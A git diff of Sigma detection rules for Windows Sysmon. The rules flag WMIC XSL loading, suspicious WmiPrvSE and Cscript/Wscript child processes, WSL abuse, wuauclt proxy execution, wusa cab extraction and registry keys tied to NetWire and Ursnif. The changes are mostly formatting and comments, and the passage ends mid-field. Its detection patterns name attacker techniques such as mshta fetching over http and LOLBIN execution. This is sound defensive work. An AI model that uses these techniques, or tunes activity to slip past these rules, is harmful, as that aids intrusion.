b/sigma/sysmon/process_creation/proc_creation_win_wmic_xsl_script_processing.yml index e9af4a795..ab27f4e6d 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_wmic_xsl_script_processing.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_wmic_xsl_script_processing.yml @@ -1,16 +1,10 @@ title: XSL Script Execution Via WMIC.EXE id: 05c36dd6-79d6-4a9a-97da-3db20298ab2d status: test -description: 'Detects the execution of WMIC with the "format" flag to potentially - load XSL files. - - Adversaries abuse this functionality to execute arbitrary files while potentially - bypassing application whitelisting defenses. - - Extensible Stylesheet Language (XSL) files are commonly used to describe the processing - and rendering of data within XML files. - - ' +description: | + Detects the execution of WMIC with the "format" flag to potentially load XSL files. + Adversaries abuse this functionality to execute arbitrary files while potentially bypassing application whitelisting defenses. + Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1220/T1220.md author: Timur Zinniatullin, oscd.community, Swachchhanda Shrawan Poudel @@ -29,11 +23,11 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: \wmic.exe - CommandLine|contains: - - /format - - -format + CommandLine|contains: + - /format # wmic process list /FORMAT /? + - -format # wmic process list -FORMAT /? filter_main_known_format: - CommandLine|contains: + CommandLine|contains: - Format:List - Format:htable - Format:hform @@ -45,8 +39,7 @@ detection: - Format:csv condition: process_creation and (selection and not 1 of filter_main_*) falsepositives: - - WMIC.exe FP depend on scripts and administrative methods used in the monitored - environment. + - WMIC.exe FP depend on scripts and administrative methods used in the monitored environment. - Static format arguments - https://petri.com/command-line-wmi-part-3 level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_wmiprvse_spawning_process.yml b/sigma/sysmon/process_creation/proc_creation_win_wmiprvse_spawning_process.yml index 7be9ac072..57071d9be 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_wmiprvse_spawning_process.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_wmiprvse_spawning_process.yml @@ -1,10 +1,10 @@ title: WmiPrvSE Spawned A Process id: d21374ff-f574-44a7-9998-4a8c8bf33d7d related: - - id: 8a582fe2-0882-4b89-a82a-da6b2dc32937 - type: similar - - id: 692f0bec-83ba-4d04-af7e-e884a96059b6 - type: similar + - id: 8a582fe2-0882-4b89-a82a-da6b2dc32937 + type: similar + - id: 692f0bec-83ba-4d04-af7e-e884a96059b6 + type: similar status: stable description: Detects WmiPrvSE spawning a process references: @@ -27,18 +27,18 @@ detection: ParentImage|endswith: \WmiPrvSe.exe filter_logonid: LogonId: - - '0x3e7' - - 'null' + - '0x3e7' # LUID 999 for SYSTEM + - 'null' # too many false positives filter_system_user: - User|contains: + User|contains: # covers many language settings - AUTHORI - AUTORI filter_wmiprvse: Image|endswith: \WmiPrvSE.exe filter_werfault: Image|endswith: \WerFault.exe - filter_null: - LogonId: null + filter_null: # some backends need the null value in a separate expression + LogonId: condition: process_creation and (selection and not 1 of filter_*) falsepositives: - False positives are expected (e.g. in environments where WinRM is used legitimately) diff --git a/sigma/sysmon/process_creation/proc_creation_win_wmiprvse_spawns_powershell.yml b/sigma/sysmon/process_creation/proc_creation_win_wmiprvse_spawns_powershell.yml index 9ddedff32..df9315d84 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_wmiprvse_spawns_powershell.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_wmiprvse_spawns_powershell.yml @@ -1,13 +1,12 @@ title: Potential WMI Lateral Movement WmiPrvSE Spawned PowerShell id: 692f0bec-83ba-4d04-af7e-e884a96059b6 related: - - id: 8a582fe2-0882-4b89-a82a-da6b2dc32937 - type: similar - - id: d21374ff-f574-44a7-9998-4a8c8bf33d7d - type: similar + - id: 8a582fe2-0882-4b89-a82a-da6b2dc32937 + type: similar + - id: d21374ff-f574-44a7-9998-4a8c8bf33d7d + type: similar status: stable -description: Detects Powershell as a child of the WmiPrvSE process. Which could be - a sign of lateral movement via WMI. +description: Detects Powershell as a child of the WmiPrvSE process. Which could be a sign of lateral movement via WMI. references: - https://any.run/report/68bc255f9b0db6a0d30a8f2dadfbee3256acfe12497bf93943bc1eab0735e45e/a2385d6f-34f7-403c-90d3-b1f9d2a90a5e author: Markus Neis @Karneades @@ -28,12 +27,12 @@ detection: selection_parent: ParentImage|endswith: \WmiPrvSE.exe selection_img: - - Image|endswith: - - \powershell.exe - - \pwsh.exe - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll + - Image|endswith: + - \powershell.exe + - \pwsh.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll condition: process_creation and (all of selection_*) falsepositives: - AppvClient diff --git a/sigma/sysmon/process_creation/proc_creation_win_wmiprvse_susp_child_processes.yml b/sigma/sysmon/process_creation/proc_creation_win_wmiprvse_susp_child_processes.yml index 25ededcef..37bf2dc7c 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_wmiprvse_susp_child_processes.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_wmiprvse_susp_child_processes.yml @@ -1,12 +1,12 @@ title: Suspicious WmiPrvSE Child Process id: 8a582fe2-0882-4b89-a82a-da6b2dc32937 related: - - id: 692f0bec-83ba-4d04-af7e-e884a96059b6 - type: similar - - id: d21374ff-f574-44a7-9998-4a8c8bf33d7d - type: similar - - id: 18cf6cf0-39b0-4c22-9593-e244bdc9a2d4 - type: obsoletes + - id: 692f0bec-83ba-4d04-af7e-e884a96059b6 + type: similar + - id: d21374ff-f574-44a7-9998-4a8c8bf33d7d + type: similar + - id: 18cf6cf0-39b0-4c22-9593-e244bdc9a2d4 + type: obsoletes status: test description: Detects suspicious and uncommon child processes of WmiPrvSE references: @@ -34,6 +34,7 @@ detection: selection_parent: ParentImage|endswith: \wbem\WmiPrvSE.exe selection_children_1: + # TODO: Add more LOLBINs or suspicious processes that make sens in your environment Image|endswith: - \certutil.exe - \cscript.exe @@ -44,8 +45,9 @@ detection: - \verclsid.exe - \wscript.exe selection_children_2: + # This is in a separate selection due to the nature of FP generated with CMD Image|endswith: \cmd.exe - CommandLine|contains: + CommandLine|contains: - cscript - mshta - powershell @@ -56,12 +58,11 @@ detection: filter_main_werfault: Image|endswith: \WerFault.exe filter_main_wmiprvse: - Image|endswith: \WmiPrvSE.exe + Image|endswith: \WmiPrvSE.exe # In some legitimate case WmiPrvSE was seen spawning itself filter_main_msiexec: Image|endswith: \msiexec.exe - CommandLine|contains: '/i ' - condition: process_creation and (selection_parent and 1 of selection_children_* - and not 1 of filter_main_*) + CommandLine|contains: '/i ' + condition: process_creation and (selection_parent and 1 of selection_children_* and not 1 of filter_main_*) falsepositives: - Unknown level: high diff --git a/sigma/sysmon/process_creation/proc_creation_win_wpbbin_potential_persistence.yml b/sigma/sysmon/process_creation/proc_creation_win_wpbbin_potential_persistence.yml index 46a81f905..d3b953996 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_wpbbin_potential_persistence.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_wpbbin_potential_persistence.yml @@ -1,8 +1,7 @@ title: UEFI Persistence Via Wpbbin - ProcessCreation id: 4abc0ec4-db5a-412f-9632-26659cddf145 status: test -description: Detects execution of the binary "wpbbin" which is used as part of the - UEFI based persistence method described in the reference section +description: Detects execution of the binary "wpbbin" which is used as part of the UEFI based persistence method described in the reference section references: - https://grzegorztworek.medium.com/using-uefi-to-inject-executable-files-into-bitlocker-protected-drives-8ff4ca59c94c - https://persistence-info.github.io/Data/wpbbin.html @@ -24,7 +23,6 @@ detection: Image: C:\Windows\System32\wpbbin.exe condition: process_creation and selection falsepositives: - - Legitimate usage of the file by hardware manufacturer such as lenovo (Thanks - @0gtweet for the tip) + - Legitimate usage of the file by hardware manufacturer such as lenovo (Thanks @0gtweet for the tip) level: high ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_wscript_cscript_script_exec.yml b/sigma/sysmon/process_creation/proc_creation_win_wscript_cscript_script_exec.yml index f2fb5e0ac..8d0a5be33 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_wscript_cscript_script_exec.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_wscript_cscript_script_exec.yml @@ -1,11 +1,10 @@ title: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript id: 1e33157c-53b1-41ad-bbcc-780b80b58288 related: - - id: 23250293-eed5-4c39-b57a-841c8933a57d - type: obsoletes + - id: 23250293-eed5-4c39-b57a-841c8933a57d + type: obsoletes status: test -description: Detects script file execution (.js, .jse, .vba, .vbe, .vbs, .wsf) by - Wscript/Cscript +description: Detects script file execution (.js, .jse, .vba, .vbe, .vbs, .wsf) by Wscript/Cscript author: Michael Haag date: 2019/01/16 modified: 2023/05/15 @@ -22,14 +21,14 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - OriginalFileName: - - wscript.exe - - cscript.exe - - Image|endswith: - - \wscript.exe - - \cscript.exe + - OriginalFileName: + - wscript.exe + - cscript.exe + - Image|endswith: + - \wscript.exe + - \cscript.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - .js - .jse - .vba @@ -38,7 +37,6 @@ detection: - .wsf condition: process_creation and (all of selection_*) falsepositives: - - Some additional tuning is required. It is recommended to add the user profile - path in CommandLine if it is getting too noisy. + - Some additional tuning is required. It is recommended to add the user profile path in CommandLine if it is getting too noisy. level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_wscript_cscript_susp_child_processes.yml b/sigma/sysmon/process_creation/proc_creation_win_wscript_cscript_susp_child_processes.yml index 95e631400..0bb9ec2f7 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_wscript_cscript_susp_child_processes.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_wscript_cscript_susp_child_processes.yml @@ -1,14 +1,9 @@ title: Cscript/Wscript Potentially Suspicious Child Process id: b6676963-0353-4f88-90f5-36c20d443c6a status: experimental -description: 'Detects potentially suspicious child processes of Wscript/Cscript. These - include processes such as rundll32 with uncommon exports or PowerShell spawning - rundll32 or regsvr32. - - Malware such as Pikabot and Qakbot were seen using similar techniques as well - as many others. - - ' +description: | + Detects potentially suspicious child processes of Wscript/Cscript. These include processes such as rundll32 with uncommon exports or PowerShell spawning rundll32 or regsvr32. + Malware such as Pikabot and Qakbot were seen using similar techniques as well as many others. references: - Internal Research - https://github.com/pr0xylife/Pikabot/blob/main/Pikabot_30.10.2023.txt @@ -35,12 +30,13 @@ detection: - \cmd.exe - \powershell.exe - \pwsh.exe + # Note: Add other combinations that are suspicious selection_cli_script_option_mshta: - CommandLine|contains|all: + CommandLine|contains|all: - mshta - http selection_cli_script_option_other: - CommandLine|contains: + CommandLine|contains: - rundll32 - regsvr32 - msiexec @@ -48,15 +44,12 @@ detection: Image|endswith: \rundll32.exe filter_main_rundll32_known_exports: Image|endswith: \rundll32.exe - CommandLine|contains: + CommandLine|contains: - UpdatePerUserSystemParameters - PrintUIEntry - ClearMyTracksByProcess - condition: process_creation and (selection_parent and ( selection_cli_standalone - or (selection_cli_script_main and 1 of selection_cli_script_option_*) ) and - not 1 of filter_main_*) + condition: process_creation and (selection_parent and ( selection_cli_standalone or (selection_cli_script_main and 1 of selection_cli_script_option_*) ) and not 1 of filter_main_*) falsepositives: - - Some false positives might occur with admin or third party software scripts. - Investigate and apply additional filters accordingly. + - Some false positives might occur with admin or third party software scripts. Investigate and apply additional filters accordingly. level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_wscript_cscript_uncommon_extension_exec.yml b/sigma/sysmon/process_creation/proc_creation_win_wscript_cscript_uncommon_extension_exec.yml index 157fede93..57d261b6e 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_wscript_cscript_uncommon_extension_exec.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_wscript_cscript_uncommon_extension_exec.yml @@ -1,8 +1,7 @@ title: Cscript/Wscript Uncommon Script Extension Execution id: 99b7460d-c9f1-40d7-a316-1f36f61d52ee status: experimental -description: Detects Wscript/Cscript executing a file with an uncommon (i.e. non-script) - extension +description: Detects Wscript/Cscript executing a file with an uncommon (i.e. non-script) extension author: Nasreddine Bencherchali (Nextron Systems) date: 2023/05/15 modified: 2023/06/19 @@ -19,14 +18,16 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - OriginalFileName: - - wscript.exe - - cscript.exe - - Image|endswith: - - \wscript.exe - - \cscript.exe + - OriginalFileName: + - wscript.exe + - cscript.exe + - Image|endswith: + - \wscript.exe + - \cscript.exe selection_extension: - CommandLine|contains: + CommandLine|contains: + # Note: add additional potential suspicious extension + # We could specify the "//E:" flag to avoid typos by admin. But since that's prone to blind spots via the creation of assoc it's better not to include it - .csv - .dat - .doc diff --git a/sigma/sysmon/process_creation/proc_creation_win_wsl_child_processes_anomalies.yml b/sigma/sysmon/process_creation/proc_creation_win_wsl_child_processes_anomalies.yml index 884305968..be504d460 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_wsl_child_processes_anomalies.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_wsl_child_processes_anomalies.yml @@ -1,12 +1,10 @@ title: WSL Child Process Anomaly id: 2267fe65-0681-42ad-9a6d-46553d3f3480 related: - - id: dec44ca7-61ad-493c-bfd7-8819c5faa09b - type: derived + - id: dec44ca7-61ad-493c-bfd7-8819c5faa09b # LOLBIN Rule + type: derived status: experimental -description: Detects uncommon or suspicious child processes spawning from a WSL process. - This could indicate an attempt to evade parent/child relationship detections or - persistence attempts via cron using WSL +description: Detects uncommon or suspicious child processes spawning from a WSL process. This could indicate an attempt to evade parent/child relationship detections or persistence attempts via cron using WSL references: - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Wsl/ - https://twitter.com/nas_bench/status/1535431474429808642 @@ -32,6 +30,7 @@ detection: - \wslhost.exe selection_children_images: Image|endswith: + # Add more suspicious/uncommon "lolbin" processes - \calc.exe - \cmd.exe - \cscript.exe diff --git a/sigma/sysmon/process_creation/proc_creation_win_wsl_lolbin_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_wsl_lolbin_execution.yml index 68fb0d908..553282efe 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_wsl_lolbin_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_wsl_lolbin_execution.yml @@ -1,11 +1,10 @@ title: Arbitrary Command Execution Using WSL id: dec44ca7-61ad-493c-bfd7-8819c5faa09b related: - - id: 2267fe65-0681-42ad-9a6d-46553d3f3480 - type: similar + - id: 2267fe65-0681-42ad-9a6d-46553d3f3480 # Generic susp child processes rules + type: similar status: test -description: Detects potential abuse of Windows Subsystem for Linux (WSL) binary as - a LOLBIN to execute arbitrary Linux or Windows commands +description: Detects potential abuse of Windows Subsystem for Linux (WSL) binary as a LOLBIN to execute arbitrary Linux or Windows commands references: - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Wsl/ - https://twitter.com/nas_bench/status/1535431474429808642 @@ -26,28 +25,31 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \wsl.exe - - OriginalFileName: wsl.exe + - Image|endswith: \wsl.exe + - OriginalFileName: wsl.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - ' -e ' - ' --exec' - ' --system' - ' --shell-type ' - - ' /mnt/c' + - ' /mnt/c' # Path to mounted "C:\" partition (Indication of running Windows binaries via WSL) - ' --user root' - ' -u root' - --debug-shell filter_main_kill: + # This filter is to handle a FP that occurs when a process is spawned from WSL and then closed by the user + # Example would be to open VsCode through it's server extension from WSL + # GrandparentCommandLine: "C:\Users\XXX\AppData\Local\Programs\Microsoft VS Code\Code.exe" --ms-enable-electron-run-as-node c:\Users\XXX\.vscode\extensions\ms-vscode-remote.remote-wsl-0.72.0\dist\wslDaemon.js + # ParentCommandLine: C:\WINDOWS\system32\cmd.exe /d /s /c "C:\WINDOWS\System32\wsl.exe -d Ubuntu-20.04 -e kill 1366" + # CommandLine: C:\WINDOWS\System32\wsl.exe -d Ubuntu-20.04 -e kill 1366 ParentImage|endswith: \cmd.exe - CommandLine|contains|all: + CommandLine|contains|all: - ' -d ' - ' -e kill ' condition: process_creation and (all of selection_* and not 1 of filter_main_*) falsepositives: - - Automation and orchestration scripts may use this method to execute scripts - etc. - - Legitimate use by Windows to kill processes opened via WSL (example VsCode WSL - server) + - Automation and orchestration scripts may use this method to execute scripts etc. + - Legitimate use by Windows to kill processes opened via WSL (example VsCode WSL server) level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_wsl_windows_binaries_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_wsl_windows_binaries_execution.yml index a6aee5ecd..4577580f7 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_wsl_windows_binaries_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_wsl_windows_binaries_execution.yml @@ -1,8 +1,7 @@ title: Windows Binary Executed From WSL id: ed825c86-c009-4014-b413-b76003e33d35 status: test -description: Detects the execution of Windows binaries from within a WSL instance. - This could be used to masquerade parent-child relationships +description: Detects the execution of Windows binaries from within a WSL instance. This could be used to masquerade parent-child relationships references: - Internal Research author: Nasreddine Bencherchali (Nextron Systems) @@ -21,7 +20,7 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|re: '[a-zA-Z]:\\' - CurrentDirectory|contains: \\\\wsl.localhost + CurrentDirectory|contains: \\\\wsl.localhost # Note: programs not supporting UNC paths (example: cmd.exe). Will default to another location condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_wuauclt_dll_loading.yml b/sigma/sysmon/process_creation/proc_creation_win_wuauclt_dll_loading.yml index f9a4ac24a..6c217d932 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_wuauclt_dll_loading.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_wuauclt_dll_loading.yml @@ -1,18 +1,16 @@ title: Proxy Execution Via Wuauclt.EXE id: af77cf95-c469-471c-b6a0-946c685c4798 related: - - id: ba1bb0cb-73da-42de-ad3a-de10c643a5d0 - type: obsoletes - - id: d7825193-b70a-48a4-b992-8b5b3015cc11 - type: obsoletes + - id: ba1bb0cb-73da-42de-ad3a-de10c643a5d0 + type: obsoletes + - id: d7825193-b70a-48a4-b992-8b5b3015cc11 + type: obsoletes status: test -description: Detects the use of the Windows Update Client binary (wuauclt.exe) for - proxy execution. +description: Detects the use of the Windows Update Client binary (wuauclt.exe) for proxy execution. references: - https://dtm.uk/wuauclt/ - https://blog.malwarebytes.com/threat-intelligence/2022/01/north-koreas-lazarus-apt-leverages-windows-update-client-github-in-latest-campaign/ -author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), Florian Roth - (Nextron Systems), Sreeman, FPT.EagleEye Team +author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), Florian Roth (Nextron Systems), Sreeman, FPT.EagleEye Team date: 2020/10/12 modified: 2023/11/11 tags: @@ -28,22 +26,24 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \wuauclt.exe - - OriginalFileName: wuauclt.exe + - Image|endswith: \wuauclt.exe + - OriginalFileName: wuauclt.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - UpdateDeploymentProvider - RunHandlerComServer filter_main_generic: - CommandLine|contains: ' /UpdateDeploymentProvider UpdateDeploymentProvider.dll ' + # Note: Please enhance this if you find the full path + CommandLine|contains: ' /UpdateDeploymentProvider UpdateDeploymentProvider.dll ' filter_main_wuaueng: - CommandLine|contains: ' wuaueng.dll ' + # Note: Please enhance this if you find the full path + CommandLine|contains: ' wuaueng.dll ' filter_main_uus: - CommandLine|contains: + CommandLine|contains: - :\Windows\UUS\Packages\Preview\amd64\updatedeploy.dll /ClassId - :\Windows\UUS\amd64\UpdateDeploy.dll /ClassId filter_main_winsxs: - CommandLine|contains|all: + CommandLine|contains|all: - :\Windows\WinSxS\ - '\UpdateDeploy.dll /ClassId ' condition: process_creation and (all of selection_* and not 1 of filter_main_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_wuauclt_no_cli_flags_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_wuauclt_no_cli_flags_execution.yml index 58606ee03..1ecedc533 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_wuauclt_no_cli_flags_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_wuauclt_no_cli_flags_execution.yml @@ -1,10 +1,8 @@ title: Suspicious Windows Update Agent Empty Cmdline id: 52d097e2-063e-4c9c-8fbb-855c8948d135 status: test -description: 'Detects suspicious Windows Update Agent activity in which a wuauclt.exe - process command line doesn''t contain any command line flags - - ' +description: | + Detects suspicious Windows Update Agent activity in which a wuauclt.exe process command line doesn't contain any command line flags references: - https://redcanary.com/blog/blackbyte-ransomware/ author: Florian Roth (Nextron Systems) @@ -22,10 +20,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \Wuauclt.exe - - OriginalFileName: Wuauclt.exe + - Image|endswith: \Wuauclt.exe + - OriginalFileName: Wuauclt.exe selection_cli: - CommandLine|endswith: + CommandLine|endswith: - Wuauclt - Wuauclt.exe condition: process_creation and (all of selection*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_wusa_cab_files_extraction.yml b/sigma/sysmon/process_creation/proc_creation_win_wusa_cab_files_extraction.yml index c1e601e25..b680642a1 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_wusa_cab_files_extraction.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_wusa_cab_files_extraction.yml @@ -1,9 +1,7 @@ title: Wusa Extracting Cab Files id: 59b39960-5f9d-4a49-9cef-1e4d2c1d0cb9 status: test -description: Detects usage of the "wusa.exe" (Windows Update Standalone Installer) - utility to extract cab using the "/extract" argument which is not longer supported. - This could indicate an attacker using an old technique +description: Detects usage of the "wusa.exe" (Windows Update Standalone Installer) utility to extract cab using the "/extract" argument which is not longer supported. This could indicate an attacker using an old technique references: - https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html author: Nasreddine Bencherchali (Nextron Systems) @@ -20,10 +18,9 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: \wusa.exe - CommandLine|contains: '/extract:' + CommandLine|contains: '/extract:' condition: process_creation and selection falsepositives: - - The "extract" flag still works on older 'wusa.exe' versions, which could be - a legitimate use (monitor the path of the cab being extracted) + - The "extract" flag still works on older 'wusa.exe' versions, which could be a legitimate use (monitor the path of the cab being extracted) level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_wusa_cab_files_extraction_from_susp_paths.yml b/sigma/sysmon/process_creation/proc_creation_win_wusa_cab_files_extraction_from_susp_paths.yml index eb239705c..5a7eaf037 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_wusa_cab_files_extraction_from_susp_paths.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_wusa_cab_files_extraction_from_susp_paths.yml @@ -1,8 +1,7 @@ title: Wusa.EXE Extracting Cab Files From Suspicious Paths id: c74c0390-3e20-41fd-a69a-128f0275a5ea status: test -description: Detects usage of the "wusa.exe" (Windows Update Standalone Installer) - utility to extract cab using the "/extract" argument from suspicious paths +description: Detects usage of the "wusa.exe" (Windows Update Standalone Installer) utility to extract cab using the "/extract" argument from suspicious paths references: - https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html - https://www.echotrail.io/insights/search/wusa.exe/ @@ -21,13 +20,15 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection_root: Image|endswith: \wusa.exe - CommandLine|contains: '/extract:' + CommandLine|contains: '/extract:' selection_paths: - CommandLine|contains: + CommandLine|contains: - :\PerfLogs\ - :\Users\Public\ - :\Windows\Temp\ - \Appdata\Local\Temp\ + # - '\Desktop\' + # - '\Downloads\' condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_wusa_susp_parent_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_wusa_susp_parent_execution.yml index 9678eb18a..bf002e3f0 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_wusa_susp_parent_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_wusa_susp_parent_execution.yml @@ -1,10 +1,8 @@ title: Wusa.EXE Executed By Parent Process Located In Suspicious Location id: ef64fc9c-a45e-43cc-8fd8-7d75d73b4c99 status: experimental -description: 'Detects execution of the "wusa.exe" (Windows Update Standalone Installer) - utility by a parent process that is located in a suspicious location. - - ' +description: | + Detects execution of the "wusa.exe" (Windows Update Standalone Installer) utility by a parent process that is located in a suspicious location. references: - https://www.fortinet.com/blog/threat-research/konni-campaign-distributed-via-malicious-document author: X__Junior (Nextron Systems) @@ -29,18 +27,18 @@ detection: - \Appdata\Local\Temp\ - \Temporary Internet selection_paths_2: - - ParentImage|contains|all: - - :\Users\ - - \Favorites\ - - ParentImage|contains|all: - - :\Users\ - - \Favourites\ - - ParentImage|contains|all: - - :\Users\ - - \Contacts\ - - ParentImage|contains|all: - - :\Users\ - - \Pictures\ + - ParentImage|contains|all: + - :\Users\ + - \Favorites\ + - ParentImage|contains|all: + - :\Users\ + - \Favourites\ + - ParentImage|contains|all: + - :\Users\ + - \Contacts\ + - ParentImage|contains|all: + - :\Users\ + - \Pictures\ condition: process_creation and (selection_img and 1 of selection_paths_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_tampering/proc_tampering_susp_process_hollowing.yml b/sigma/sysmon/process_tampering/proc_tampering_susp_process_hollowing.yml index 6bb042c84..7d45b657f 100644 --- a/sigma/sysmon/process_tampering/proc_tampering_susp_process_hollowing.yml +++ b/sigma/sysmon/process_tampering/proc_tampering_susp_process_hollowing.yml @@ -1,8 +1,7 @@ title: Potential Process Hollowing Activity id: c4b890e5-8d8c-4496-8c66-c805753817cd status: experimental -description: Detects when a memory process image does not match the disk image, indicative - of process hollowing. +description: Detects when a memory process image does not match the disk image, indicative of process hollowing. references: - https://twitter.com/SecurePeacock/status/1486054048390332423?s=20 - https://www.bleepingcomputer.com/news/microsoft/microsoft-sysmon-now-detects-malware-process-tampering-attempts/ @@ -34,8 +33,7 @@ detection: Image|endswith: \opera.exe filter_optional_edge: Image|endswith: \WindowsApps\MicrosoftEdge.exe - condition: process_tampering and (selection and not 1 of filter_main_* and not - 1 of filter_optional_*) + condition: process_tampering and (selection and not 1 of filter_main_* and not 1 of filter_optional_*) falsepositives: - Unknown level: medium diff --git a/sigma/sysmon/raw_access_thread/raw_access_thread_susp_disk_access_using_uncommon_tools.yml b/sigma/sysmon/raw_access_thread/raw_access_thread_susp_disk_access_using_uncommon_tools.yml index ebdf26084..ec8f2d39c 100644 --- a/sigma/sysmon/raw_access_thread/raw_access_thread_susp_disk_access_using_uncommon_tools.yml +++ b/sigma/sysmon/raw_access_thread/raw_access_thread_susp_disk_access_using_uncommon_tools.yml @@ -1,9 +1,7 @@ title: Potential Defense Evasion Via Raw Disk Access By Uncommon Tools id: db809f10-56ce-4420-8c86-d6a7d793c79c status: test -description: Detects raw disk access using uncommon tools or tools that are located - in suspicious locations (heavy filtering is required), which could indicate possible - defense evasion attempts +description: Detects raw disk access using uncommon tools or tools that are located in suspicious locations (heavy filtering is required), which could indicate possible defense evasion attempts references: - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment author: Teymur Kheirkhabarov, oscd.community @@ -53,7 +51,7 @@ detection: - \Executables\SSDUpdate.exe - \HostMetadata\NVMEHostmetadata.exe filter_main_null: - Image: null + Image: filter_main_systemsettings: Image|endswith: :\Windows\ImmersiveControlPanel\SystemSettings.exe filter_optional_github_desktop: diff --git a/sigma/sysmon/registry/registry_add/registry_add_malware_netwire.yml b/sigma/sysmon/registry/registry_add/registry_add_malware_netwire.yml index 67e3b6f73..c38c94920 100644 --- a/sigma/sysmon/registry/registry_add/registry_add_malware_netwire.yml +++ b/sigma/sysmon/registry/registry_add/registry_add_malware_netwire.yml @@ -23,7 +23,8 @@ detection: EventID: 12 Channel: Microsoft-Windows-Sysmon/Operational selection: - EventType: CreateKey + EventType: CreateKey + # The configuration information is usually stored under HKCU:\Software\Netwire - RedCanary TargetObject|contains: \software\NetWire condition: registry_add and selection falsepositives: diff --git a/sigma/sysmon/registry/registry_add/registry_add_malware_ursnif.yml b/sigma/sysmon/registry/registry_add/registry_add_malware_ursnif.yml index c9205b8d8..55d2d892a 100644 --- a/sigma/sysmon/registry/registry_add/registry_add_malware_ursnif.yml +++ b/sigma/sysmon/registry/registry_add/registry_add_malware_ursnif.yml @@ -20,7 +20,7 @@ detection: EventID: 12 Channel: Microsoft-Windows-Sysmon/Operational selection: - EventType: CreateKey + EventType: CreateKey TargetObject|contains: \Software\AppDataLow\Software\Microsoft\ filter: TargetObject|contains: diff --git a/sigma/sysmon/registry/registry_add/registry_add_persistence_amsi_providers.yml b/sigma/sysmon/registry/registry_add/registry_add_persistence_amsi_providers.yml index 73320d139..7cefd5c0c 100644 --- a/sigma/sysmon/registry/registry_add/registry_add_persistence_amsi_providers.yml +++ b/sigma/sysmon/registry/registry_add/registry_add_persistence_amsi_providers.yml @@ -1,8 +1,7 @@ title: Potential Persistence Via New AMSI Providers - Registry id: 33efc23c-6ea2-4503-8cfe-bdf82ce8f705 status: test -description: Detects when an attacker registers a new AMSI provider in order to achieve - persistence +description: Detects when an attacker registers a new AMSI provider in order to achieve persistence references: - 